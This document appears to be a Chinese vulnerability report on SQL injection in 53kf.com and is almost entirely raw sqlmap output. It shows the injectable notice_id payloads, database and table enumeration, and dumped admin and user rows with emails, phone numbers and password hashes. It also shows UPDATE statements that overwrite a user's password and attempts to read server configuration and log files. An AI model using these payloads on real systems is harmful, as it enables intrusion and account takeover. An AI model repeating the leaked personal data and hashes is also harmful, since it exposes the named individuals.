### 简要描述: 53kf.com的SQL严重注入漏洞导致主站及其多个分站数据库可以被脱裤,Mysql用户为Root,虽不能写文件,但是可以读文件,文件代码看光光~~由于找不到后台,暂时没拿到webshell,反正拿不拿shell估计都是20个Rank,所以懒得费劲了~ ### 详细说明: sqlmap identified the following injection points with a total of 57 HTTP(s) requests: --- Place: GET Parameter: notice_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: notice_id=25 AND 4489=4489 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: notice_id=25 AND SLEEP(5) --- available databases [18]: [*] 53kf_old [*] 53kfcs [*] en [*] en1 [*] entalk [*] information_schema [*] ip [*] ip5 [*] ip_bak [*] ip_new [*] mysql [*] passport [*] talk [*] test [*] ut [*] v5 [*] v5110110 [*] v5_old sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: notice_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: notice_id=25 AND 4489=4489 Type: AND/OR time-based blind Title: MySQL...
### 简要描述: 53kf.com的SQL严重注入漏洞导致主站及其多个分站数据库可以被脱裤,Mysql用户为Root,虽不能写文件,但是可以读文件,文件代码看光光~~由于找不到后台,暂时没拿到webshell,反正拿不拿shell估计都是20个Rank,所以懒得费劲了~ ### 详细说明: sqlmap identified the following injection points with a total of 57 HTTP(s) requests: --- Place: GET Parameter: notice_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: notice_id=25 AND 4489=4489 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: notice_id=25 AND SLEEP(5) --- available databases [18]: [*] 53kf_old [*] 53kfcs [*] en [*] en1 [*] entalk [*] information_schema [*] ip [*] ip5 [*] ip_bak [*] ip_new [*] mysql [*] passport [*] talk [*] test [*] ut [*] v5 [*] v5110110 [*] v5_old sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: notice_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: notice_id=25 AND 4489=4489 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: notice_id=25 AND SLEEP(5) --- Database: 53kfcs [14 tables] +------------------+ | admin_oper | | admin_oper_bill | | cs_address | | cs_adv | | cs_category | | cs_company | | cs_company_bill | | cs_fav | | cs_index_product | | cs_mail | | cs_notice | | cs_order | | cs_product | | cs_same_product | +------------------+ sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: notice_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: notice_id=25 AND 4489=4489 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: notice_id=25 AND SLEEP(5) --- Database: v5 [52 tables] +---------------------+ | ad | | ad_count | | ad_show | | ad_show_js | | conf_ip1 | | cps_commission_log | | cps_user | | cps_user_account | | cps_user_logs | | cps_withdrawing_log | | daemonlog_recv | | daemonlog_send | | gggj_account | | gggj_accountHistory | | gggj_ad | | gggj_ad_old | | gggj_adstat | | gggj_config | | gggj_master_type | | gggj_master_user | | gggj_oper_log | | gggj_require | | gggj_solution | | gggj_spread | | gggj_stat | | gggj_user | | gggj_user_config | | id_record | | kf_tuo | | kf_tuo_test | | mailqueue | | official_adstat | | official_stat | | out_links | | out_links_message | | pub_cps | | sendemail_record | | user_infor | | user_infor_xx | | v5_admin_group | | v5_admin_oper | | v5_agent_bill | | v5_agent_oper | | v5_cate | | v5_company | | v5_company_account | | v5_company_bill | | v5_company_config | | v5_company_talk_log | | v5_worker | | web_ad_out_links | | web_user_url | +---------------------+ sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: notice_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: notice_id=25 AND 4489=4489 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: notice_id=25 AND SLEEP(5) --- select count(*) from v5.cps_user: '1367' sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: notice_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: notice_id=25 AND 4489=4489 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: notice_id=25 AND SLEEP(5) --- select count(*) from v5.gggj_user: '225' sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: notice_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: notice_id=25 AND 4489=4489 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: notice_id=25 AND SLEEP(5) --- select count(*) from v5.v5_admin_oper: '3' sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: notice_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: notice_id=25 AND 4489=4489 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: notice_id=25 AND SLEEP(5) --- Database: ut [85 tables] +--------------------------+ | access | | access_log | | account_switch | | agent_oper | | agent_style_lock | | announcement | | autoreply | | autoreply2 | | block_user | | chat_nation | | chat_net | | chat_place | | chat_search | | chat_worker | | com_talk | | com_talk_all_moved | | com_talk_bak | | com_talk_hnqyw | | com_talk_online | | company | | company_config | | company_config1 | | company_style | | company_talk | | company_yiyuan | | company_yiyuan2 | | conf_ip1 | | conf_ip1_old | | conf_sync | | config_id_remark | | config_value_remark | | cus_bill | | cus_group | | cus_link | | cus_mail | | cus_sms | | cus_theme | | cus_user | | customer | | customer2 | | cyy | | cyy_group | | err_infos | | face | | file | | imessage | | jiulong_log | | link | | logsql | | mail | | mail_template | | mailqueue | | message | | message2 | | module | | module2 | | robot | | robot_mem | | room_message | | sms_config | | sms_lword | | sql_sync | | stat | | stat_from | | stat_nation | | stat_place | | stat_search | | stat_to | | sys_notify | | talk_evalu | | talk_his | | talk_his_delete | | talk_his_read | | talk_id | | talk_subject | | talk_total | | talk_vote | | user | | user2 | | worker | | worker_config | | worker_group | | worker_online_log | | worker_online_log_detail | | worker_talk | +--------------------------+ sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: notice_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: notice_id=25 AND 4489=4489 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: notice_id=25 AND SLEEP(5) --- select * from v5.v5_admin_oper [3]: [*] 18981795@qq.com, 605, 761, 0, , louwb, 1115adb0c8644ead44e6192dafb54f96b9d3bfdf, 13588816882, 18981795, , [*] tagaxi@gmail.com, 605, 762, 0, , wangys, 30c24dcd9266d646c92bb164d63cbb8b457ce6f8, 13858193074, 88579737, , [*] WILL@sina.com, 605, 763, 0, , xuxt, e01bc777acca079d1c41b47660583bc346bc526e, 111, 111, , sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: notice_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: notice_id=25 AND 4489=4489 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: notice_id=25 AND SLEEP(5) --- Database: talk [80 tables] +--------------------------+ | access | | access_log | | account_switch | | agent_oper | | agent_style_lock | | announcement | | area_kf | | autoreply | | block_user | | chat_nation | | chat_net | | chat_place | | chat_search | | chat_worker | | company | | company_ad | | company_config | | company_etel | | company_style | | conf_ip1 | | conf_ip1_old | | conf_sync | | config_id_remark | | config_value_remark | | cus_bill | | cus_group | | cus_link | | cus_mail | | cus_sms | | cus_theme | | cus_user | | customer | | cyy | | cyy_group | | err_infos | | etel_logo | | face | | file | | identity | | imessage | | jiulong_log | | link | | logo | | logsql | | mail_template | | mailqueue | | message | | module | | module_special | | robot | | robot_mem | | room_message | | sms_config | | sms_lword | | sql_sync | | stat | | stat_from | | stat_keyword_month | | stat_nation | | stat_place | | stat_search | | stat_to | | sys_notify | | talk_evalu | | talk_his | | talk_his_delete | | talk_his_read | | talk_id | | talk_subject | | talk_total | | talk_vote | | v5_company_config | | worker | | worker_config | | worker_group | | worker_online_log | | worker_online_log_detail | | zsk_category | | zsk_key | | zsk_question | +--------------------------+ sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: notice_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: notice_id=25 AND 4489=4489 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: notice_id=25 AND SLEEP(5) --- sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: notice_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: notice_id=25 AND 4489=4489 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: notice_id=25 AND SLEEP(5) --- current database: 'v5' sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: notice_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: notice_id=25 AND 4489=4489 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: notice_id=25 AND SLEEP(5) --- select * from v5.cps_user where username='clzzy444':None sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: notice_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: notice_id=25 AND 4489=4489 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: notice_id=25 AND SLEEP(5) --- Database: v5 Table: cps_user [13 columns] +-------------------+--------------+ | Column | Type | +-------------------+--------------+ | balance | float(10,2) | | cash_frozen_money | float(10,2) | | company_url | varchar(50) | | contact_name | varchar(50) | | cust_id | varchar(20) | | id | int(20) | | is_checked | tinyint(2) | | is_verified | tinyint(2) | | mobile | varchar(11) | | pwd | varchar(50) | | qq | varchar(11) | | reg_num | int(10) | | user_name | varchar(100) | +-------------------+--------------+ sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: notice_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: notice_id=25 AND 4489=4489 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: notice_id=25 AND SLEEP(5) --- select * from v5.cps_user where user_name='clzzy444':None sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: notice_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: notice_id=25 AND 4489=4489 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: notice_id=25 AND SLEEP(5) --- select * from v5.cps_user where id='clzzy444':None sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: notice_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: notice_id=25 AND 4489=4489 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: notice_id=25 AND SLEEP(5) --- select * from v5.cps_user where qq='235623654' [1]: [*] 0.00, 0.00, http://www.ggggww.com, ?????????, clzzy444, 28024, 1, 1, 15829002900, my81trWOM1JpY, 235623654, 0, clzzy@qq.com sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: notice_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: notice_id=25 AND 4489=4489 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: notice_id=25 AND SLEEP(5) --- select count(*) from v5.cps_user where balance>100: '7' sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: notice_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: notice_id=25 AND 4489=4489 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: notice_id=25 AND SLEEP(5) --- select count(*) from v5.cps_user where balance>1000: '0' sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: notice_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: notice_id=25 AND 4489=4489 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: notice_id=25 AND SLEEP(5) --- select count(*) from v5.cps_user where balance>500: '2' sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: notice_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: notice_id=25 AND 4489=4489 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: notice_id=25 AND SLEEP(5) --- select count(*) from v5.cps_user where cash_frozen_money>500: '0' sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: notice_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: notice_id=25 AND 4489=4489 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: notice_id=25 AND SLEEP(5) --- select count(*) from v5.cps_user where cash_frozen_money>100: '0' sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: notice_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: notice_id=25 AND 4489=4489 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: notice_id=25 AND SLEEP(5) --- select count(*) from v5.cps_user where cash_frozen_money>600: '0' sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: notice_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: notice_id=25 AND 4489=4489 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: notice_id=25 AND SLEEP(5) --- select count(*) from v5.cps_user where cash_frozen_money>550: '0' sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: notice_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: notice_id=25 AND 4489=4489 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: notice_id=25 AND SLEEP(5) --- select count(*) from v5.cps_user where balance>550: '2' sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: notice_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: notice_id=25 AND 4489=4489 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: notice_id=25 AND SLEEP(5) --- select count(*) from v5.cps_user where balance>650: '1' sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: notice_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: notice_id=25 AND 4489=4489 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: notice_id=25 AND SLEEP(5) --- select * from v5.cps_user where balance>550 [2]: [*] 600.00, 0.00, http://www.53kf.com, ?????????, 53kflify, 27811, 1, 0, 15727949427, mynK8lOObPeyY, 635731110, 63, lifangyuan7878@163.com [*] 700.00, 0.00, http://www.53kf.com, ??????, 53kfxupan, 27812, 1, 1, 13750928493, my8OmAlyld.yw, 2324347056, 38, yazixupan@163.com sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: notice_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: notice_id=25 AND 4489=4489 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: notice_id=25 AND SLEEP(5) --- update v5.cps_user set pwd='my81trWOM1JpY ' where user_name='lifangyuan7878@163.com':None sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: notice_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: notice_id=25 AND 4489=4489 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: notice_id=25 AND SLEEP(5) --- update v5.cps_user set pwd='my81trWOM1JpY' where user_name='lifangyuan7878@163.com':None sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: notice_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: notice_id=25 AND 4489=4489 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: notice_id=25 AND SLEEP(5) --- update v5.cps_user set pwd='my81trWOM1JpY' where user_name='lifangyuan7878@163.com':None sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: notice_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: notice_id=25 AND 4489=4489 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: notice_id=25 AND SLEEP(5) --- select * where user_name='lifangyuan7878@163.com':None sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: notice_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: notice_id=25 AND 4489=4489 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: notice_id=25 AND SLEEP(5) --- sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: notice_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: notice_id=25 AND 4489=4489 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: notice_id=25 AND SLEEP(5) --- select pwd from v5.cps_user where user_name='lifangyuan7878@163.com' [1]: [*] mynK8lOObPeyY sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: notice_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: notice_id=25 AND 4489=4489 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: notice_id=25 AND SLEEP(5) --- database management system users privileges: [*] %% (administrator) [26]: privilege: ALTER privilege: ALTER ROUTINE privilege: CREATE privilege: CREATE ROUTINE privilege: CREATE TEMPORARY TABLES privilege: CREATE USER privilege: CREATE VIEW privilege: DELETE privilege: DROP privilege: EXECUTE privilege: FILE privilege: INDEX privilege: INSERT privilege: LOCK TABLES privilege: PROCESS privilege: REFERENCES privilege: RELOAD privilege: REPLICATION CLIENT privilege: REPLICATION SLAVE privilege: SELECT privilege: SHOW DATABASES privilege: SHOW VIEW privilege: SHUTDOWN privilege: SUPER privilege: UPDATE privilege: USAGE [*] %root% (administrator) [25]: privilege: ALTER privilege: ALTER ROUTINE privilege: CREATE privilege: CREATE ROUTINE privilege: CREATE TEMPORARY TABLES privilege: CREATE USER privilege: CREATE VIEW privilege: DELETE privilege: DROP privilege: EXECUTE privilege: FILE privilege: INDEX privilege: INSERT privilege: LOCK TABLES privilege: PROCESS privilege: REFERENCES privilege: RELOAD privilege: REPLICATION CLIENT privilege: REPLICATION SLAVE privilege: SELECT privilege: SHOW DATABASES privilege: SHOW VIEW privilege: SHUTDOWN privilege: SUPER privilege: UPDATE sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: notice_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: notice_id=25 AND 4489=4489 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: notice_id=25 AND SLEEP(5) --- sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: notice_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: notice_id=25 AND 4489=4489 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: notice_id=25 AND SLEEP(5) --- /apache/logs/error.log file saved to:None sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: notice_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: notice_id=25 AND 4489=4489 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: notice_id=25 AND SLEEP(5) --- /etc/httpd/logs/acces_log file saved to:None sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: notice_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: notice_id=25 AND 4489=4489 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: notice_id=25 AND SLEEP(5) --- /etc/httpd/conf/httpd.conf file saved to:None sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: notice_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: notice_id=25 AND 4489=4489 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: notice_id=25 AND SLEEP(5) --- /usr/local/apache/conf/httpd.conf file saved to:None sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: notice_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: notice_id=25 AND 4489=4489 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: notice_id=25 AND SLEEP(5) --- /var/www/html/apache/conf/httpd.conf file saved to:None sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: notice_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: notice_id=25 AND 4489=4489 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: notice_id=25 AND SLEEP(5) --- /var/www/html/apache/conf/httpd.conf file saved to:None sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: notice_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: notice_id=25 AND 4489=4489 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: notice_id=25 AND SLEEP(5) --- /home/httpd/conf/httpd.conf file saved to:None sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: notice_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: notice_id=25 AND 4489=4489 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: notice_id=25 AND SLEEP(5) --- sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: notice_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: notice_id=25 AND 4489=4489 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: notice_id=25 AND SLEEP(5) --- sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: notice_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: notice_id=25 AND 4489=4489 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: notice_id=25 AND SLEEP(5) --- Database: v5 Table: cps_withdrawing_log [14 columns] +------------------------+------------------+ | Column | Type | +------------------------+------------------+ | account_user | varchar(20) | | audit_oper | varchar(20) | | audit_remark | text | | audit_time | datetime | | cust_id | varchar(20) | | id | int(20) | | io_remark | text | | money | float(10,2) | | status | varchar(30) | | withdrawing_account | varchar(50) | | withdrawing_audit_oper | varchar(20) | | withdrawing_remark | text | | withdrawing_time | datetime | | withdrawing_type | int(10) unsigned | +------------------------+------------------+ Database: v5 Table: ad [19 columns] +------------+--------------+ | Column | Type | +------------+--------------+ | ad_area | varchar(150) | | ad_content | varchar(255) | | ad_flag | tinyint(1) | | ad_type | varchar(2) | | ad_url | varchar(100) | | company_id | bigint(20) | | exp_day | date | | id | int(11) | | lang | varchar(5) | | money | float(10,2) | | oem | varchar(20) | | proxy | varchar(20) | | remark | mediumtext | | seller | varchar(20) | | start_day | date | | sys_flag | tinyint(1) | | t_day | datetime | | t_edit_day | date | | vip_order | int(10) | +------------+--------------+ Database: v5 Table: pub_cps [6 columns] +----------+-------------+ | Column | Type | +----------+-------------+ | content | text | | id | int(20) | | pub_date | datetime | | pub_type | varchar(20) | | title | text | | url | varchar(50) | +----------+-------------+ Database: v5 Table: v5_company_account [10 columns] +--------------+------------------+ | Column | Type | +--------------+------------------+ | active_money | float(7,2) | | company_id | int(20) unsigned | | fee_date | date | | fee_money | int(10) | | fee_total | int(10) | | fix_money | float(7,2) | | fz_money | float(7,2) | | id | int(20) unsigned | | money | float(7,2) | | pre_total | int(20) | +--------------+------------------+ Database: v5 Table: kf_tuo_test [10 columns] +-----------+--------------+ | Column | Type | +-----------+--------------+ | ad_id | int(10) | | ad_type | varchar(10) | | area | varchar(100) | | arg | varchar(30) | | come_date | datetime | | come_ip | varchar(20) | | come_url | varchar(250) | | host | varchar(30) | | id | int(10) | | user_id | int(10) | +-----------+--------------+ Database: v5 Table: v5_admin_group [3 columns] +------------+-------------+ | Column | Type | +------------+-------------+ | id | int(11) | | name | varchar(50) | | permission | text | +------------+-------------+ Database: v5 Table: gggj_spread [8 columns] +-------------+---------------+ | Column | Type | +-------------+---------------+ | add_time | date | | admin_audit | enum('Y','N') | | end_time | date | | id | int(10) | | log | text | | money | varchar(10) | | wzz_audit | enum('Y','N') | | wzz_name | varchar(10) | +-------------+---------------+ Database: v5 Table: gggj_stat [10 columns] +-------------+-------------------+ | Column | Type | +-------------+-------------------+ | ad_date | date | | ad_from | tinyint(2) | | ad_id | int(11) | | ad_price | float | | Clearing | enum('Y','N','X') | | click | int(11) | | disp | int(11) | | domain_name | varchar(20) | | end_time | timestamp | | money_type | tinyint(2) | +-------------+-------------------+ Database: v5 Table: v5_admin_oper [11 columns] +-----------+------------------+ | Column | Type | +-----------+------------------+ | email | varchar(50) | | group_id | smallint(2) | | id | int(10) unsigned | | is_admin | tinyint(2) | | name | varchar(128) | | oper_name | varchar(20) | | oper_pwd | varchar(50) | | phone | varchar(15) | | qq | varchar(12) | | reg_date | datetime | | type | varchar(100) | +-----------+------------------+ Database: v5 Table: daemonlog_send [3 columns] +--------+----------+ | Column | Type | +--------+----------+ | action | char(16) | | sendid | char(20) | | stat | text | +--------+----------+ Database: v5 Table: daemonlog_recv [3 columns] +-------------+----------+ | Column | Type | +-------------+----------+ | action | char(16) | | last_recvid | char(20) | | stat | text | +-------------+----------+ Database: v5 Table: v5_cate [3 columns] +--------+------------------+ | Column | Type | +--------+------------------+ | id | int(20) unsigned | | name | varchar(40) | | pid | int(20) | +--------+------------------+ Database: v5 Table: out_links_message [4 columns] +-----------+--------------+ | Column | Type | +-----------+--------------+ | id | int(10) | | message | varchar(256) | | time | datetime | | user_name | varchar(25) | +-----------+--------------+ Database: v5 Table: gggj_solution [5 columns] +----------+-------------+ | Column | Type | +----------+-------------+ | add_date | datetime | | add_user | int(10) | | content | text | | id | int(10) | | title | varchar(50) | +----------+-------------+ Database: v5 Table: official_stat [9 columns] +-------------+-------------------+ | Column | Type | +-------------+-------------------+ | ad_date | date | | ad_from | tinyint(2) | | ad_id | int(11) | | ad_price | float | | Clearing | enum('Y','N','X') | | click | int(11) | | disp | int(11) | | domain_name | varchar(20) | | money_type | tinyint(2) | +-------------+-------------------+ Database: v5 Table: gggj_oper_log [5 columns] +-----------+-------------+ | Column | Type | +-----------+-------------+ | id | int(11) | | log | text | | oper_time | datetime | | type | varchar(10) | | user_id | varchar(20) | +-----------+-------------+ Database: v5 Table: cps_user_logs [8 columns] +----------------+--------------+ | Column | Type | +----------------+--------------+ | after_content | varchar(255) | | before_content | varchar(255) | | classname | varchar(30) | | createtime | datetime | | logs_id | int(11) | | oper_name | varchar(30) | | operating | varchar(30) | | sqlstr | text | +----------------+--------------+ Database: v5 Table: gggj_user [7 columns] +-------------+--------------+ | Column | Type | +-------------+--------------+ | accountCode | varchar(50) | | add_time | date | | domain_name | varchar(20) | | gggj_type | varchar(10) | | id | int(11) | | industry | varchar(5) | | remark | varchar(255) | +-------------+--------------+ Database: v5 Table: v5_company [51 columns] +---------------------+------------------+ | Column | Type | +---------------------+------------------+ | add_time | datetime | | address | varchar(255) | | admin_flag | tinyint(1) | | chat_num | int(10) | | chat_num_last | int(10) | | chat_num_last_total | int(10) | | city | varchar(50) | | comm_num | int(10) | | company_id | int(10) unsigned | | domain_name | varchar(20) | | email | varchar(50) | | fax | varchar(20) | | free_click | int(10) | | friend_links | int(10) | | hot_num | int(10) | | indus | varchar(50) | | key_word | varchar(60) | | kf_bind | tinyint(2) | | kf_id | varchar(30) | | kf_type | tinyint(3) | | last_login | datetime | | linkman | varchar(25) | | logo | varchar(25) | | method | tinyint(1) | | method_nnet | tinyint(1) | | name | varchar(255) | | net_reg | tinyint(1) | | notes | text | | online | bigint(20) | | order_flag | tinyint(1) | | paim | float | | phone | varchar(40) | | province | varchar(50) | | proxy | varchar(50) | | qq | varchar(50) | | real_proxy | varchar(50) | | reg_from | varchar(4) | | search | varchar(255) | | sell_name | varchar(20) | | sell_stat | tinyint(2) | | short_name | varchar(255) | | show_flag | tinyint(2) | | t_date | float(10,2) | | t_today | date | | t_total | float(10,2) | | talk_area | varchar(150) | | talk_etime | tinyint(10) | | talk_stime | tinyint(10) | | talk_url | varchar(100) | | url | varchar(50) | | vip_order | int(11) | +---------------------+------------------+ Database: v5 Table: v5_agent_bill [8 columns] +----------+---------------------+ | Column | Type | +----------+---------------------+ | agent_id | int(11) | | balance | float(7,2) unsigned | | id | int(10) unsigned | | io_time | datetime | | io_type | int(10) unsigned | | money | float unsigned | | orderid | varchar(20) | | reason | text | +----------+---------------------+ Database: v5 Table: v5_company_bill [13 columns] +-------------+------------------+ | Column | Type | +-------------+------------------+ | company_id | int(20) | | date | datetime | | id | int(20) unsigned | | ip | varchar(50) | | istalk | tinyint(1) | | money | float(7,2) | | old_comid | bigint(20) | | orderid | varchar(20) | | pay_way | varchar(20) | | person_name | varchar(100) | | remark | text | | src | varchar(20) | | type | tinyint(2) | +-------------+------------------+ Database: v5 Table: gggj_ad [15 columns] +-------------+-------------------+ | Column | Type | +-------------+-------------------+ | ad_code | text | | ad_content | varchar(50) | | ad_name | varchar(50) | | ad_price | float | | ad_url | text | | add_time | datetime | | audit | 